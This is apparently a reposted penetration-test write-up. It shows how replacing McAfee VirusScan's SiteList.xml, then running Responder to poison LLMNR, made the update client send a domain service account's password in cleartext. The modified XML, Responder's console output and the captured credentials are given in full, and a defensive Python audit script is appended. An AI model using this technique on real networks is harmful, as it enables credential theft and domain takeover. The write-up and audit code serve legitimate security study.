From:
https://www.92aq.com/2016/02/01/mcafee-sitelist-xml.html
Original: https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
During a penetration test I did while interning, I found a nice way to escalate privileges from a domain user. My work machine had McAfee VirusScan Enterprise 8.8i installed, and I only had a low-privileged account.
McAfee has a feature for custom update servers, which the client can reach over HTTP or SMB. SiteList.xml (in C:\ProgramData\McAfee\Common Framework) contains some interesting information, including a few internal server names ...
<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
  <SiteList Default="1" Name="SomeGUID">
    <HttpSite Type="fallback" Name="McAfeeHttp" Order="26" Enabled="1" Local="0" Server="update.nai.com:80">
      <RelativePath>Products/CommonUpdater</RelativePath>
      <UseAuth>0</UseAuth>
      <UserName></UserName>
      <Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password>
    </HttpSite>
    <UNCSite Type="repository" Name="Paris" Order="13" Server="paris001" Enabled="1" Local="0">
      <ShareName>Repository$</ShareName>
      <RelativePath></RelativePath>
      <UseLoggedonUserAccount>0</UseLoggedonUserAccount>
      <DomainName>companydomain</DomainName>
      <UserName>McAfeeService</UserName>
      <Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
    </UNCSite>
    <UNCSite Type="repository" Name="Tokyo" Order="18" Server="tokyo000" Enabled="1" Local="0">
      <ShareName>Repository$</ShareName>
      <RelativePath></RelativePath>
      <UseLoggedonUserAccount>0</UseLoggedonUserAccount>
      <DomainName>companydomain</DomainName>
      <UserName>McAfeeService</UserName>
      <Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
    </UNCSite>
  </SiteList>
</ns:SiteLists>
Let's see what privileges the McAfeeService user has.
PS C:\Users\TAirane> net user McAfeeService /domain
The request will be processed at a domain controller for domain companydomain.

User name                    McAfeeService
Full Name                    McAfee ePO
Comment                      Service Account for ePO Replication
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            29/01/2007 16:03:12
Password expires             Never
Password changeable          29/01/2007 16:03:12
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   29/01/2016 17:55:09

Logon hours allowed          All

Local Group Memberships      *All Repository          *Repository
Global Group memberships     *Domain Services Account *Workstations Administrator
                             *Servers Administrator   *Domain Users
The command completed successfully.
Unfortunately the AV is protected by a GUI password, so I couldn't edit the file. Still, I downloaded a fresh copy of McAfee in my VM and overwrote the SiteList.xml on my work machine.
At this point I knew I was close. I modified the file to look roughly like the following, then used Responder to spoof replies to some HTTP requests.
<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
  <SiteList Default="1" Name="SomeGUID">
    <HttpSite Type="fallback" Name="PWNED!" Order="26" Enabled="1" Local="0" Server="fuckingrandomserver:80">
      <RelativePath>LICORNE</RelativePath>
      <UseAuth>1</UseAuth>
      <UserName>McAfeeService</UserName>
      <Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
    </HttpSite>
  </SiteList>
</ns:SiteLists>
I clicked "update" on the McAfee virus definitions and started Responder.
root@kali:~/Tools/responder# python Responder.py -I eth0 --basic

           NBT-NS, LLMNR & MDNS Responder 2.3

  Original work by Laurent Gaffie (lgaffie@trustwave.com)
  To kill this script hit CRTL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [ON]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [ON]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [eth0]
    Responder IP               [192.168.169.140]
    Challenge set              [1122334455667788]

[+] Listening for events...
[*] [LLMNR]  Poisoned answer sent to 192.168.169.141 for name fuckingrandomserver
[HTTP] Basic Client   : 192.168.169.141
[HTTP] Basic Username : McAfeeService
[HTTP] Basic Password : *cool_its_a_strong_password/*
Holy crap, I got it! Now I have control of the domain.
Mission accomplished!
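As an added, defender-side example that is not part of the original post: a small Python audit that parses a SiteList.xml in the format shown above and flags every enabled site that will present a stored account (an HttpSite with UseAuth=1, which sends HTTP Basic credentials over port 80, or a UNCSite with UseLoggedonUserAccount=0 and a UserName, which logs on to the share with the stored domain account). The sample XML inside is constructed, modelled on the post's entries; the function and field names are mine.

```python
import xml.etree.ElementTree as ET

# Constructed sample, modelled on the SiteList.xml entries shown in the post.
SAMPLE_SITELIST = """<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
 <SiteList Default="1" Name="SomeGUID">
  <HttpSite Type="fallback" Name="McAfeeHttp" Order="26" Enabled="1" Local="0" Server="update.nai.com:80">
   <RelativePath>Products/CommonUpdater</RelativePath><UseAuth>0</UseAuth>
   <UserName></UserName><Password Encrypted="1">XXXX</Password>
  </HttpSite>
  <UNCSite Type="repository" Name="Paris" Order="13" Server="paris001" Enabled="1" Local="0">
   <ShareName>Repository$</ShareName><RelativePath></RelativePath>
   <UseLoggedonUserAccount>0</UseLoggedonUserAccount>
   <DomainName>companydomain</DomainName><UserName>McAfeeService</UserName>
   <Password Encrypted="1">YYYY</Password>
  </UNCSite>
 </SiteList>
</ns:SiteLists>"""

def _text(site, tag):
    """Text of a direct child element, or '' if the child is absent or empty."""
    node = site.find(tag)
    return (node.text or "").strip() if node is not None else ""

def audit_sitelist(xml_text):
    """Return one finding per enabled site that authenticates with a stored account.
    HttpSite + UseAuth=1 -> HTTP Basic credentials sent to the Server (cleartext on :80).
    UNCSite + UseLoggedonUserAccount=0 -> SMB logon with the stored DomainName\\UserName."""
    findings = []
    for site in ET.fromstring(xml_text.encode("utf-8")).iter():
        if site.tag not in ("HttpSite", "UNCSite") or site.get("Enabled") != "1":
            continue
        user = _text(site, "UserName")
        if site.tag == "HttpSite":
            stored = _text(site, "UseAuth") == "1"
            reason = "HTTP Basic auth with stored account"
        else:
            stored = _text(site, "UseLoggedonUserAccount") == "0"
            reason = "SMB logon with stored account"
        if stored and user:
            domain = _text(site, "DomainName")
            findings.append({"site": site.get("Name"), "kind": site.tag,
                             "server": site.get("Server"), "reason": reason,
                             "account": f"{domain}\\{user}" if domain else user})
    return findings

if __name__ == "__main__":
    for f in audit_sitelist(SAMPLE_SITELIST):
        print(f"{f['kind']} {f['site']!r} -> {f['server']}: {f['reason']} ({f['account']})")
```

Pointed at C:\ProgramData\McAfee\Common Framework\SiteList.xml, it inventories which accounts the agent will hand to each update server, so an over-privileged service account like the one above can be found before someone else does.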